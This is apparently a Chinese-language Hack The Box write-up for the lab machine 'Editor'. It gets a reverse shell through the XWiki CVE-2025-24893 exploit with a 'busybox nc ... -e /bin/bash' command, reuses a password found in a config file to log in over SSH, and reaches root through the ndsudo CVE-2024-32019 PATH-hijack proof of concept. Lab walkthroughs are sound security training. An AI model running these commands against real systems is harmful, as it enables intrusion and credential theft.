[HTB] editor - HackMD

[TOC] ## Editor ![image](https://hackmd.io/_uploads/rkTiavRoxx.png) https://app.hackthebox.com/machines/Editor ### nmap 10.10.11.80 -sC -sN -A :::spoiler Starting Nmap 7.94 ( https://nmap.org ) at 2025-09-22 01:29 EDT Nmap scan report for 10.10.11.80 Host is up (0.23s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://editor.htb/ |_http-server-header: nginx/1.18.0 (Ubuntu) 8080/tcp open http Jetty 10.0.20 | http-methods: |_ Potentially risky methods: PROPFIND LOCK UNLOCK |_http-open-proxy: Proxy might be redirecting requests | http-robots.txt: 50 disallowed entries (15 shown) | /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ | /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ | /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ | /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ | /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ |_/xwiki/bin/undelete/ |_http-server-header: Jetty(10.0.20) | http-webdav-scan: | WebDAV type: Unknown | Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK |_ Server Type: Jetty(10.0.20) | http-title: XWiki - Main - Intro |_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/ | http-cookie-flags: | /: | JSESSIONID: |_ httponly flag not set No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94%E=4%D=9/22%OT=22%CT=1%CU=40101%PV=Y%DS=2%DC=T%G=Y%TM=68D0DF3 OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ OS:(SP=105%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=3%ISR=10D%TI=Z% OS:CI=Z%TS=A)SEQ(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=107%GCD=1% OS:ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M552ST11NW7%O2=M552ST11NW7%O3=M552NNT OS:11NW7%O4=M552ST11NW7%O5=M552ST11NW7%O6=M552ST11)WIN(W1=FE88%W2=FE88%W3=F OS:E88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M552NNSNW7%CC=Y%Q OS:=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40% OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q= OS:)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A= OS:S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RU OS:CK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1 262.26 ms 10.10.14.1 2 262.85 ms 10.10.11.80 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 107.20 seconds ::: ### 檢查版本漏洞 #### Jetty 10.0.20 https://www.cybersecurity-help.cz/vdb/eclipse/jetty/10.0.20/ ![image](https://hackmd.io/_uploads/rkJcADAoeg.png) 1. 2025/8/21 - 漏洞編號 : CVE-2025-5115 - 漏洞危害 : Resource exhaustion 2. 2024/10/14 - 漏洞編號 : CVE-2024-6763 - 漏洞危害 : Server-Side Request Forgery (SSRF) #### XWiki Debian 15.10.8 - 漏洞編號 : CVE-2025-24893 - 漏洞危害 : RCE > XWiki Debian 15.10.8 看起來比較嚴重，從這邊下手 > Groovy 是 base on JAVA 的程式 ### 利用現有 CVE 有現有的 CVE-2025-24893 exploit 參考以下連結 https://github.com/gunzf0x/CVE-2025-24893/blob/main/CVE-2025-24893.py :::success python3 cve_2025_24893.py -t http://10.10.11.80:8080/ -c 'busybox nc 10.10.14.44 4445 -e /bin/bash' ::: ![image](https://hackmd.io/_uploads/B1NO7Fy2lx.png) ![image](https://hackmd.io/_uploads/SkVvmFkhex.png) :::success pwd 目前路徑 : /usr/lib/xwiki-jetty ::: 在 /usr/lib/xwiki-jetty/jetty/etc 位置中發現 :::success <Set name="KeyStorePath"> <Call name="resolvePath" class="org.eclipse.jetty.xml.XmlConfiguration"> <Arg><Property name="jetty.base"/></Arg> <Arg><Property name="jetty.sslContext.keyStorePath" ... default="etc/keystore.p12" /></Arg> </Call> ::: 但是在 etc 沒有發現 keystore.p12，又發現一個 xwiki 資料夾 ![image](https://hackmd.io/_uploads/Hyw9qtkhex.png) 在 hibernate.cfg.xml 裡面找到唯一個密碼不是 xwiki 的內容 ![image](https://hackmd.io/_uploads/Sk7Q6Fy3gl.png) :::success theEd1t0rTeam99 ::: 在 /var/lib/xwiki/data 路徑發現 configuration.properties 檔案 :::success xwiki.authentication.validationKey = \uBF48\u0EE2\u03FE\u4B0F\u3C8E\u35DA\uEEB8\u4013\u1E90\uF9A7\u4040\u28EA\uD217\u288BF\u6AF7\u377E\u295C\uC98D\u17FB5\uD3D4\u967F\uB8DE\u955B\uD54B\uEE55\u890D\uAFFC\u993B\u1C49\u9B87 xwiki.authentication.encryptionKey = \uC327\u7B18\u1FFE\u913D\uEDBD\u6C85\uE778\uD7C6\u91D0\uA56F\uE1CB\u014B\uD03E\u9E5D\uED9D\uB44A\u3A0C\u1C76\uF0D6\u8289\u645F\u6EB8\u00EB\u99DA\u589E\uE3CE\uC24A\u9486\u5EAB\u2E85\uCCEB\uAF4D ::: 在 /home 路徑發現 oliver 使用者但是權限不夠 ![image](https://hackmd.io/_uploads/Bkeyrq1hel.png) 去 ssh 資料夾，但是權限不夠 ![image](https://hackmd.io/_uploads/SJIEL51nex.png) ### ssh 不知道怎看 oliver，拿剛剛找到的密碼去試 ssh 結果可以成功登入 ![image](https://hackmd.io/_uploads/Hymmaokhge.png) cat user.txt 就找到第一個 flag ### 想辦法提權 :::info find / -type f -perm -4000 -user root 2>/dev/null :::  SUID (Set User ID) 當一般使用者執行這個檔案時，程式會以檔案擁有者的身份運行，而不是用呼叫者的身份 :::success /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo /opt/netdata/usr/libexec/netdata/plugins.d/ioping /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/su /usr/bin/umount /usr/bin/chsh /usr/bin/fusermount3 /usr/bin/sudo /usr/bin/passwd /usr/bin/mount /usr/bin/chfn /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/libexec/polkit-agent-helper-1 ::: 問 chatgpt 這些檔案有沒有現成 CVE 可以用 ![image](https://hackmd.io/_uploads/ryA3Wn1heg.png) :::success - /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo [ CVE-2024-32019 ] - /usr/bin/sudo [ CVE-2025-32462 & CVE-2025-32463 ] ::: 發現 CVE-2024-32019 有現有的 exploit 可以使用 https://github.com/AliElKhatteb/CVE-2024-32019-POC/blob/main/README.md :::info step1 : 下載 exploit.c 檔案，記得把檔案的 ip 改成自己的 ip step2 : compile 成 nvme `x86_64-linux-gnu-gcc -o nvme exploit.c -static` step3 : 檢查 ![image](https://hackmd.io/_uploads/Hk5fKhJ3gx.png) step4 : 把執行檔上傳到 oliver `scp nvme oliver@10.10.11.80:/home/oliver` step5 : 檢查確實有個可執行檔 ![image](https://hackmd.io/_uploads/BJ4dF2yhle.png) step6 : 開一個用來接收的 port `nc -lvnp 4445` step7 : 執行 exploit `PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list` ::: 回到接收端可以看到成功提權了 ![image](https://hackmd.io/_uploads/H1s_c3J3ge.png) 到 root 目錄底下可以發現 root.txt 檔案，打開就可以看到 flag 了 ![image](https://hackmd.io/_uploads/S1cjc21heg.png)